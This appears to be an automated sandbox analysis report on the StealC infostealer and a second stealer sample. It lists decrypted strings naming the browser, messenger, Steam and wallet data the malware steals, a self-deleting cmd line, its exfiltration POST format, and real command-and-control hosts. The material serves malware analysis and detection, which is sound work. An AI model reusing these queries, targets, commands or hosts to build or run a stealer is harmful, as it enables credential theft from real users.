Source: 6.2.stealc_default2.exe.f10000.0.unpack	String decryptor: .txt
Source: 6.2.stealc_default2.exe.f10000.0.unpack	String decryptor: SELECT HOST_KEY, is_httponly, path, is_secure, (expires_utc/1000000)-11644480800, name, encrypted_value from cookies
Source: 6.2.stealc_default2.exe.f10000.0.unpack	String decryptor: TRUE
Source: 6.2.stealc_default2.exe.f10000.0.unpack	String decryptor: FALSE
Source: 6.2.stealc_default2.exe.f10000.0.unpack	String decryptor: autofill
Source: 6.2.stealc_default2.exe.f10000.0.unpack	String decryptor: SELECT name, value FROM autofill
Source: 6.2.stealc_default2.exe.f10000.0.unpack	String decryptor: history
Source: 6.2.stealc_default2.exe.f10000.0.unpack	String decryptor: SELECT url FROM urls LIMIT 1000
Source: 6.2.stealc_default2.exe.f10000.0.unpack	String decryptor: cc
Source: 6.2.stealc_default2.exe.f10000.0.unpack	String decryptor: SELECT name_on_card, expiration_month, expiration_year, card_number_encrypted FROM credit_cards
Source: 6.2.stealc_default2.exe.f10000.0.unpack	String decryptor: name:
Source: 6.2.stealc_default2.exe.f10000.0.unpack	String decryptor: month:
Source: 6.2.stealc_default2.exe.f10000.0.unpack	String decryptor: year:
Source: 6.2.stealc_default2.exe.f10000.0.unpack	String decryptor: card:
Source: 6.2.stealc_default2.exe.f10000.0.unpack	String decryptor: Cookies
Source: 6.2.stealc_default2.exe.f10000.0.unpack	String decryptor: Login Data
Source: 6.2.stealc_default2.exe.f10000.0.unpack	String decryptor: Web Data
Source: 6.2.stealc_default2.exe.f10000.0.unpack	String decryptor: History
Source: 6.2.stealc_default2.exe.f10000.0.unpack	String decryptor: logins.json
Source: 6.2.stealc_default2.exe.f10000.0.unpack	String decryptor: formSubmitURL
Source: 6.2.stealc_default2.exe.f10000.0.unpack	String decryptor: usernameField
Source: 6.2.stealc_default2.exe.f10000.0.unpack	String decryptor: encryptedUsername
Source: 6.2.stealc_default2.exe.f10000.0.unpack	String decryptor: encryptedPassword
Source: 6.2.stealc_default2.exe.f10000.0.unpack	String decryptor: guid
Source: 6.2.stealc_default2.exe.f10000.0.unpack	String decryptor: SELECT host, isHttpOnly, path, isSecure, expiry, name, value FROM moz_cookies
Source: 6.2.stealc_default2.exe.f10000.0.unpack	String decryptor: SELECT fieldname, value FROM moz_formhistory
Source: 6.2.stealc_default2.exe.f10000.0.unpack	String decryptor: SELECT url FROM moz_places LIMIT 1000
Source: 6.2.stealc_default2.exe.f10000.0.unpack	String decryptor: cookies.sqlite
Source: 6.2.stealc_default2.exe.f10000.0.unpack	String decryptor: formhistory.sqlite
Source: 6.2.stealc_default2.exe.f10000.0.unpack	String decryptor: places.sqlite
Source: 6.2.stealc_default2.exe.f10000.0.unpack	String decryptor: plugins
Source: 6.2.stealc_default2.exe.f10000.0.unpack	String decryptor: Local Extension Settings
Source: 6.2.stealc_default2.exe.f10000.0.unpack	String decryptor: Sync Extension Settings
Source: 6.2.stealc_default2.exe.f10000.0.unpack	String decryptor: IndexedDB
Source: 6.2.stealc_default2.exe.f10000.0.unpack	String decryptor: Opera Stable
Source: 6.2.stealc_default2.exe.f10000.0.unpack	String decryptor: Opera GX Stable
Source: 6.2.stealc_default2.exe.f10000.0.unpack	String decryptor: CURRENT
Source: 6.2.stealc_default2.exe.f10000.0.unpack	String decryptor: chrome-extension_
Source: 6.2.stealc_default2.exe.f10000.0.unpack	String decryptor: _0.indexeddb.leveldb
Source: 6.2.stealc_default2.exe.f10000.0.unpack	String decryptor: Local State
Source: 6.2.stealc_default2.exe.f10000.0.unpack	String decryptor: profiles.ini
Source: 6.2.stealc_default2.exe.f10000.0.unpack	String decryptor: chrome
Source: 6.2.stealc_default2.exe.f10000.0.unpack	String decryptor: opera
Source: 6.2.stealc_default2.exe.f10000.0.unpack	String decryptor: firefox
Source: 6.2.stealc_default2.exe.f10000.0.unpack	String decryptor: wallets
Source: 6.2.stealc_default2.exe.f10000.0.unpack	String decryptor: %08lX%04lX%lu
Source: 6.2.stealc_default2.exe.f10000.0.unpack	String decryptor: SOFTWARE\Microsoft\Windows NT\CurrentVersion
Source: 6.2.stealc_default2.exe.f10000.0.unpack	String decryptor: ProductName
Source: 6.2.stealc_default2.exe.f10000.0.unpack	String decryptor: x32
Source: 6.2.stealc_default2.exe.f10000.0.unpack	String decryptor: x64
Source: 6.2.stealc_default2.exe.f10000.0.unpack	String decryptor: %d/%d/%d %d:%d:%d
Source: 6.2.stealc_default2.exe.f10000.0.unpack	String decryptor: HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: 6.2.stealc_default2.exe.f10000.0.unpack	String decryptor: ProcessorNameString
Source: 6.2.stealc_default2.exe.f10000.0.unpack	String decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
Source: 6.2.stealc_default2.exe.f10000.0.unpack	String decryptor: DisplayName
Source: 6.2.stealc_default2.exe.f10000.0.unpack	String decryptor: DisplayVersion
Source: 6.2.stealc_default2.exe.f10000.0.unpack	String decryptor: Network Info:
Source: 6.2.stealc_default2.exe.f10000.0.unpack	String decryptor: - IP: IP?
Source: 6.2.stealc_default2.exe.f10000.0.unpack	String decryptor: - Country: ISO?
Source: 6.2.stealc_default2.exe.f10000.0.unpack	String decryptor: System Summary:
Source: 6.2.stealc_default2.exe.f10000.0.unpack	String decryptor: - HWID:
Source: 6.2.stealc_default2.exe.f10000.0.unpack	String decryptor: - OS:
Source: 6.2.stealc_default2.exe.f10000.0.unpack	String decryptor: - Architecture:
Source: 6.2.stealc_default2.exe.f10000.0.unpack	String decryptor: - UserName:
Source: 6.2.stealc_default2.exe.f10000.0.unpack	String decryptor: - Computer Name:
Source: 6.2.stealc_default2.exe.f10000.0.unpack	String decryptor: - Local Time:
Source: 6.2.stealc_default2.exe.f10000.0.unpack	String decryptor: - UTC:
Source: 6.2.stealc_default2.exe.f10000.0.unpack	String decryptor: - Language:
Source: 6.2.stealc_default2.exe.f10000.0.unpack	String decryptor: - Keyboards:
Source: 6.2.stealc_default2.exe.f10000.0.unpack	String decryptor: - Laptop:
Source: 6.2.stealc_default2.exe.f10000.0.unpack	String decryptor: - Running Path:
Source: 6.2.stealc_default2.exe.f10000.0.unpack	String decryptor: - CPU:
Source: 6.2.stealc_default2.exe.f10000.0.unpack	String decryptor: - Threads:
Source: 6.2.stealc_default2.exe.f10000.0.unpack	String decryptor: - Cores:
Source: 6.2.stealc_default2.exe.f10000.0.unpack	String decryptor: - RAM:
Source: 6.2.stealc_default2.exe.f10000.0.unpack	String decryptor: - Display Resolution:
Source: 6.2.stealc_default2.exe.f10000.0.unpack	String decryptor: - GPU:
Source: 6.2.stealc_default2.exe.f10000.0.unpack	String decryptor: User Agents:
Source: 6.2.stealc_default2.exe.f10000.0.unpack	String decryptor: Installed Apps:
Source: 6.2.stealc_default2.exe.f10000.0.unpack	String decryptor: All Users:
Source: 6.2.stealc_default2.exe.f10000.0.unpack	String decryptor: Current User:
Source: 6.2.stealc_default2.exe.f10000.0.unpack	String decryptor: Process List:
Source: 6.2.stealc_default2.exe.f10000.0.unpack	String decryptor: system_info.txt
Source: 6.2.stealc_default2.exe.f10000.0.unpack	String decryptor: freebl3.dll
Source: 6.2.stealc_default2.exe.f10000.0.unpack	String decryptor: mozglue.dll
Source: 6.2.stealc_default2.exe.f10000.0.unpack	String decryptor: msvcp140.dll
Source: 6.2.stealc_default2.exe.f10000.0.unpack	String decryptor: nss3.dll
Source: 6.2.stealc_default2.exe.f10000.0.unpack	String decryptor: softokn3.dll
Source: 6.2.stealc_default2.exe.f10000.0.unpack	String decryptor: vcruntime140.dll
Source: 6.2.stealc_default2.exe.f10000.0.unpack	String decryptor: \Temp\
Source: 6.2.stealc_default2.exe.f10000.0.unpack	String decryptor: .exe
Source: 6.2.stealc_default2.exe.f10000.0.unpack	String decryptor: runas
Source: 6.2.stealc_default2.exe.f10000.0.unpack	String decryptor: open
Source: 6.2.stealc_default2.exe.f10000.0.unpack	String decryptor: /c start
Source: 6.2.stealc_default2.exe.f10000.0.unpack	String decryptor: %DESKTOP%
Source: 6.2.stealc_default2.exe.f10000.0.unpack	String decryptor: %APPDATA%
Source: 6.2.stealc_default2.exe.f10000.0.unpack	String decryptor: %LOCALAPPDATA%
Source: 6.2.stealc_default2.exe.f10000.0.unpack	String decryptor: %USERPROFILE%
Source: 6.2.stealc_default2.exe.f10000.0.unpack	String decryptor: %DOCUMENTS%
Source: 6.2.stealc_default2.exe.f10000.0.unpack	String decryptor: %PROGRAMFILES%
Source: 6.2.stealc_default2.exe.f10000.0.unpack	String decryptor: %PROGRAMFILES_86%
Source: 6.2.stealc_default2.exe.f10000.0.unpack	String decryptor: %RECENT%
Source: 6.2.stealc_default2.exe.f10000.0.unpack	String decryptor: *.lnk
Source: 6.2.stealc_default2.exe.f10000.0.unpack	String decryptor: files
Source: 6.2.stealc_default2.exe.f10000.0.unpack	String decryptor: \discord\
Source: 6.2.stealc_default2.exe.f10000.0.unpack	String decryptor: \Local Storage\leveldb\CURRENT
Source: 6.2.stealc_default2.exe.f10000.0.unpack	String decryptor: \Local Storage\leveldb
Source: 6.2.stealc_default2.exe.f10000.0.unpack	String decryptor: \Telegram Desktop\
Source: 6.2.stealc_default2.exe.f10000.0.unpack	String decryptor: key_datas
Source: 6.2.stealc_default2.exe.f10000.0.unpack	String decryptor: D877F783D5D3EF8C*
Source: 6.2.stealc_default2.exe.f10000.0.unpack	String decryptor: map*
Source: 6.2.stealc_default2.exe.f10000.0.unpack	String decryptor: A7FDF864FBC10B77*
Source: 6.2.stealc_default2.exe.f10000.0.unpack	String decryptor: A92DAA6EA6F891F2*
Source: 6.2.stealc_default2.exe.f10000.0.unpack	String decryptor: F8806DD0C461824F*
Source: 6.2.stealc_default2.exe.f10000.0.unpack	String decryptor: Telegram
Source: 6.2.stealc_default2.exe.f10000.0.unpack	String decryptor: Tox
Source: 6.2.stealc_default2.exe.f10000.0.unpack	String decryptor: *.tox
Source: 6.2.stealc_default2.exe.f10000.0.unpack	String decryptor: *.ini
Source: 6.2.stealc_default2.exe.f10000.0.unpack	String decryptor: Password
Source: 6.2.stealc_default2.exe.f10000.0.unpack	String decryptor: Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
Source: 6.2.stealc_default2.exe.f10000.0.unpack	String decryptor: Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
Source: 6.2.stealc_default2.exe.f10000.0.unpack	String decryptor: Software\Microsoft\Office\14.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
Source: 6.2.stealc_default2.exe.f10000.0.unpack	String decryptor: Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
Source: 6.2.stealc_default2.exe.f10000.0.unpack	String decryptor: Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
Source: 6.2.stealc_default2.exe.f10000.0.unpack	String decryptor: oftware\Microsoft\Windows Messaging Subsystem\Profiles\9375CFF0413111d3B88A00104B2A6676\
Source: 6.2.stealc_default2.exe.f10000.0.unpack	String decryptor: 00000001
Source: 6.2.stealc_default2.exe.f10000.0.unpack	String decryptor: 00000002
Source: 6.2.stealc_default2.exe.f10000.0.unpack	String decryptor: 00000003
Source: 6.2.stealc_default2.exe.f10000.0.unpack	String decryptor: 00000004
Source: 6.2.stealc_default2.exe.f10000.0.unpack	String decryptor: \Outlook\accounts.txt
Source: 6.2.stealc_default2.exe.f10000.0.unpack	String decryptor: Pidgin
Source: 6.2.stealc_default2.exe.f10000.0.unpack	String decryptor: \.purple\
Source: 6.2.stealc_default2.exe.f10000.0.unpack	String decryptor: accounts.xml
Source: 6.2.stealc_default2.exe.f10000.0.unpack	String decryptor: dQw4w9WgXcQ
Source: 6.2.stealc_default2.exe.f10000.0.unpack	String decryptor: token:
Source: 6.2.stealc_default2.exe.f10000.0.unpack	String decryptor: Software\Valve\Steam
Source: 6.2.stealc_default2.exe.f10000.0.unpack	String decryptor: SteamPath
Source: 6.2.stealc_default2.exe.f10000.0.unpack	String decryptor: \config\
Source: 6.2.stealc_default2.exe.f10000.0.unpack	String decryptor: ssfn*
Source: 6.2.stealc_default2.exe.f10000.0.unpack	String decryptor: config.vdf
Source: 6.2.stealc_default2.exe.f10000.0.unpack	String decryptor: DialogConfig.vdf
Source: 6.2.stealc_default2.exe.f10000.0.unpack	String decryptor: DialogConfigOverlay*.vdf
Source: 6.2.stealc_default2.exe.f10000.0.unpack	String decryptor: libraryfolders.vdf
Source: 6.2.stealc_default2.exe.f10000.0.unpack	String decryptor: loginusers.vdf
Source: 6.2.stealc_default2.exe.f10000.0.unpack	String decryptor: \Steam\
Source: 6.2.stealc_default2.exe.f10000.0.unpack	String decryptor: sqlite3.dll
Source: 6.2.stealc_default2.exe.f10000.0.unpack	String decryptor: browsers
Source: 6.2.stealc_default2.exe.f10000.0.unpack	String decryptor: done
Source: 6.2.stealc_default2.exe.f10000.0.unpack	String decryptor: soft
Source: 6.2.stealc_default2.exe.f10000.0.unpack	String decryptor: \Discord\tokens.txt
Source: 6.2.stealc_default2.exe.f10000.0.unpack	String decryptor: /c timeout /t 5 & del /f /q "
Source: 6.2.stealc_default2.exe.f10000.0.unpack	String decryptor: " & del "C:\ProgramData\*.dll"" & exit
Source: 6.2.stealc_default2.exe.f10000.0.unpack	String decryptor: C:\Windows\system32\cmd.exe
Source: 6.2.stealc_default2.exe.f10000.0.unpack	String decryptor: https
Source: 6.2.stealc_default2.exe.f10000.0.unpack	String decryptor: Content-Type: multipart/form-data; boundary=----
Source: 6.2.stealc_default2.exe.f10000.0.unpack	String decryptor: POST
Source: 6.2.stealc_default2.exe.f10000.0.unpack	String decryptor: HTTP/1.1
Source: 6.2.stealc_default2.exe.f10000.0.unpack	String decryptor: Content-Disposition: form-data; name="
Source: 6.2.stealc_default2.exe.f10000.0.unpack	String decryptor: hwid
Source: 6.2.stealc_default2.exe.f10000.0.unpack	String decryptor: build
Source: 6.2.stealc_default2.exe.f10000.0.unpack	String decryptor: token
Source: 6.2.stealc_default2.exe.f10000.0.unpack	String decryptor: file_name
Source: 6.2.stealc_default2.exe.f10000.0.unpack	String decryptor: file
Source: 6.2.stealc_default2.exe.f10000.0.unpack	String decryptor: message
Source: 6.2.stealc_default2.exe.f10000.0.unpack	String decryptor: ABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890
Source: 6.2.stealc_default2.exe.f10000.0.unpack	String decryptor: screenshot.jpg
Source: 36.0.RDX123456.exe.940000.0.unpack	String decryptor: servicedny.site
Source: 36.0.RDX123456.exe.940000.0.unpack	String decryptor: authorisev.site
Source: 36.0.RDX123456.exe.940000.0.unpack	String decryptor: faulteyotk.site
Source: 36.0.RDX123456.exe.940000.0.unpack	String decryptor: dilemmadu.site
Source: 36.0.RDX123456.exe.940000.0.unpack	String decryptor: contemteny.site
Source: 36.0.RDX123456.exe.940000.0.unpack	String decryptor: goalyfeastz.site
Source: 36.0.RDX123456.exe.940000.0.unpack	String decryptor: opposezmny.site
Source: 36.0.RDX123456.exe.940000.0.unpack	String decryptor: seallysl.site
Source: 36.0.RDX123456.exe.940000.0.unpack	String decryptor: computeryrati.site
Source: 36.0.RDX123456.exe.940000.0.unpack	String decryptor: lid=%s&j=%s&ver=4.0
Source: 36.0.RDX123456.exe.940000.0.unpack	String decryptor: TeslaBrowser/5.5
Source: 36.0.RDX123456.exe.940000.0.unpack	String decryptor: - Screen Resoluton:
Source: 36.0.RDX123456.exe.940000.0.unpack	String decryptor: - Physical Installed Memory:
Source: 36.0.RDX123456.exe.940000.0.unpack	String decryptor: Workgroup: -
Source: 36.0.RDX123456.exe.940000.0.unpack	String decryptor: 4SD0y4--RLREBORN

Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 6_2_00F19B60 CryptUnprotectData,LocalAlloc,memcpy,LocalFree,	6_2_00F19B60
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 6_2_00F1C820 memset,lstrlenA,CryptStringToBinaryA,PK11_GetInternalKeySlot,PK11_Authenticate,PK11SDR_Decrypt,memcpy,lstrcatA,lstrcatA,PK11_FreeSlot,lstrcatA,	6_2_00F1C820
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 6_2_00F19AC0 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,	6_2_00F19AC0
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 6_2_00F28EA0 CryptBinaryToStringA,GetProcessHeap,HeapAlloc,CryptBinaryToStringA,	6_2_00F28EA0
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 6_2_00F17240 GetProcessHeap,HeapAlloc,CryptUnprotectData,WideCharToMultiByte,LocalFree,	6_2_00F17240
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 6_2_6BF66C80 CryptQueryObject,CryptMsgGetParam,moz_xmalloc,memset,CryptMsgGetParam,CertFindCertificateInStore,free,CertGetNameStringW,moz_xmalloc,memset,CertGetNameStringW,CertFreeCertificateContext,CryptMsgClose,CertCloseStore,CreateFileW,moz_xmalloc,memset,memset,CryptQueryObject,free,CloseHandle,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,moz_xmalloc,memset,GetLastError,moz_xmalloc,memset,CryptBinaryToStringW,_wcsupr_s,free,GetLastError,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,__Init_thread_footer,__Init_thread_footer,	6_2_6BF66C80
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 6_2_6C0BA9A0 PK11SDR_Decrypt,PORT_NewArena_Util,SEC_QuickDERDecodeItem_Util,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,PK11_GetInternalKeySlot,PK11_Authenticate,PORT_FreeArena_Util,PK11_ListFixedKeysInSlot,SECITEM_ZfreeItem_Util,PK11_FreeSymKey,PK11_FreeSymKey,PORT_FreeArena_Util,PK11_FreeSymKey,SECITEM_ZfreeItem_Util,	6_2_6C0BA9A0
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 6_2_6C084420 SECKEY_DestroyEncryptedPrivateKeyInfo,memset,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,SECITEM_ZfreeItem_Util,SECITEM_ZfreeItem_Util,free,	6_2_6C084420
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 6_2_6C0B4440 PK11_PrivDecrypt,	6_2_6C0B4440
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 6_2_6C0B44C0 PK11_PubEncrypt,	6_2_6C0B44C0
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 6_2_6C1025B0 PK11_Encrypt,memcpy,PR_SetError,PK11_Encrypt,	6_2_6C1025B0
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 6_2_6C0BA650 PK11SDR_Encrypt,PORT_NewArena_Util,PK11_GetInternalKeySlot,PK11_Authenticate,SECITEM_ZfreeItem_Util,TlsGetValue,EnterCriticalSection,PR_Unlock,PK11_CreateContextBySymKey,PK11_GetBlockSize,PORT_Alloc_Util,memcpy,SECITEM_ZfreeItem_Util,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,PK11_FreeSymKey,PORT_ArenaAlloc_Util,PK11_CipherOp,SEC_ASN1EncodeItem_Util,SECITEM_ZfreeItem_Util,PORT_FreeArena_Util,PK11_DestroyContext,	6_2_6C0BA650
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 6_2_6C098670 PK11_ExportEncryptedPrivKeyInfo,	6_2_6C098670
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 6_2_6C09E6E0 PK11_AEADOp,TlsGetValue,EnterCriticalSection,PORT_Alloc_Util,PK11_Encrypt,PORT_Alloc_Util,memcpy,memcpy,PR_SetError,PR_SetError,PR_Unlock,PR_SetError,PR_Unlock,PK11_Decrypt,PR_GetCurrentThread,PK11_Decrypt,PK11_Encrypt,memcpy,memcpy,PR_SetError,free,	6_2_6C09E6E0
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 6_2_6C0DA730 SEC_PKCS12AddCertAndKey,PORT_ArenaMark_Util,PORT_ArenaMark_Util,PK11_FindKeyByAnyCert,SECKEY_DestroyPrivateKey,PORT_ArenaAlloc_Util,PR_SetError,PR_SetError,PK11_GetInternalKeySlot,PK11_FindKeyByAnyCert,SECKEY_DestroyPrivateKey,PORT_ArenaAlloc_Util,SECKEY_DestroyEncryptedPrivateKeyInfo,strlen,PR_SetError,PORT_FreeArena_Util,PORT_FreeArena_Util,PORT_ArenaAlloc_Util,PR_SetError,	6_2_6C0DA730

Source: Offnewhere.exe, 00000007.00000000.2483037403.000000000087B000.00000002.00000001.01000000.0000000A.sdmp

Binary or memory string: -----BEGIN PUBLIC KEY-----

memstr_2361c7a5-e

Source: file.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source:	Binary string: mozglue.pdbP source: stealc_default2.exe, 00000006.00000002.2674484590.000000006BFCD000.00000002.00000001.01000000.0000000D.sdmp, mozglue[1].dll.6.dr
Source:	Binary string: nss3.pdb@ source: stealc_default2.exe, 00000006.00000002.2675137486.000000006C18F000.00000002.00000001.01000000.0000000C.sdmp
Source:	Binary string: my_library.pdbU source: f6f4816752.exe, 00000031.00000003.3036164555.0000000004C2B000.00000004.00001000.00020000.00000000.sdmp, f6f4816752.exe, 00000031.00000002.3149193410.000000000031C000.00000040.00000001.01000000.0000001D.sdmp
Source:	Binary string: my_library.pdb source: f6f4816752.exe, 00000031.00000003.3036164555.0000000004C2B000.00000004.00001000.00020000.00000000.sdmp, f6f4816752.exe, 00000031.00000002.3149193410.000000000031C000.00000040.00000001.01000000.0000001D.sdmp
Source:	Binary string: nss3.pdb source: stealc_default2.exe, 00000006.00000002.2675137486.000000006C18F000.00000002.00000001.01000000.0000000C.sdmp
Source:	Binary string: mozglue.pdb source: stealc_default2.exe, 00000006.00000002.2674484590.000000006BFCD000.00000002.00000001.01000000.0000000D.sdmp, mozglue[1].dll.6.dr

Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe

Directory queried: number of queries: 1001

Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 6_2_00F1E430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,	6_2_00F1E430
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 6_2_00F24910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	6_2_00F24910
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 6_2_00F116D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	6_2_00F116D0
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 6_2_00F1F6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	6_2_00F1F6B0
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 6_2_00F23EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,FindNextFileA,FindClose,	6_2_00F23EA0
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 6_2_00F1DA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,	6_2_00F1DA80
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 6_2_00F1BE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,	6_2_00F1BE70
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 6_2_00F238B0 wsprintfA,FindFirstFileA,lstrcatA,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcatA,lstrlenA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,	6_2_00F238B0
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 6_2_00F24570 GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcatA,lstrcatA,lstrlenA,lstrlenA,	6_2_00F24570
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 6_2_00F1ED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlenA,DeleteFileA,CopyFileA,FindNextFileA,FindClose,	6_2_00F1ED20
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 6_2_00F1DE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	6_2_00F1DE10
Source: C:\Users\user\AppData\Local\Temp\1000817001\splwow64.exe	Code function: 9_2_004062D5 FindFirstFileW,FindClose,	9_2_004062D5
Source: C:\Users\user\AppData\Local\Temp\1000817001\splwow64.exe	Code function: 9_2_00402E18 FindFirstFileW,	9_2_00402E18
Source: C:\Users\user\AppData\Local\Temp\1000817001\splwow64.exe	Code function: 9_2_00406C9B DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,	9_2_00406C9B

Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\	Jump to behavior

Networking

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: http://185.215.113.17/2fb6c2cc8dce150a.php
Source: Malware configuration extractor	URLs: computeryrati.site
Source: Malware configuration extractor	URLs: goalyfeastz.site
Source: Malware configuration extractor	URLs: servicedny.site
Source: Malware configuration extractor	URLs: authorisev.site
Source: Malware configuration extractor	URLs: seallysl.site
Source: Malware configuration extractor	URLs: opposezmny.site
Source: Malware configuration extractor	URLs: faulteyotk.site
Source: Malware configuration extractor	URLs: contemteny.site
Source: Malware configuration extractor	URLs: dilemmadu.site
Source: Malware configuration extractor	URLs: http://185.215.113.17/2fb6c2cc8dce150a.php
Source: Malware configuration extractor	IPs: 185.215.113.16

Source: Joe Sandbox View	IP Address: 1.1.1.1 1.1.1.1
Source: Joe Sandbox View	IP Address: 20.42.65.92 20.42.65.92

Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe

Code function: 6_2_00F160A0 InternetOpenA,StrCmpCA,InternetOpenUrlA,CreateFileA,InternetReadFile,WriteFile,CloseHandle,InternetCloseHandle,InternetCloseHandle,

6_2_00F160A0

Source: new_v8.exe, 0000001B.00000003.2701683074.00000000011F3000.00000004.00000020.00020000.00000000.sdmp

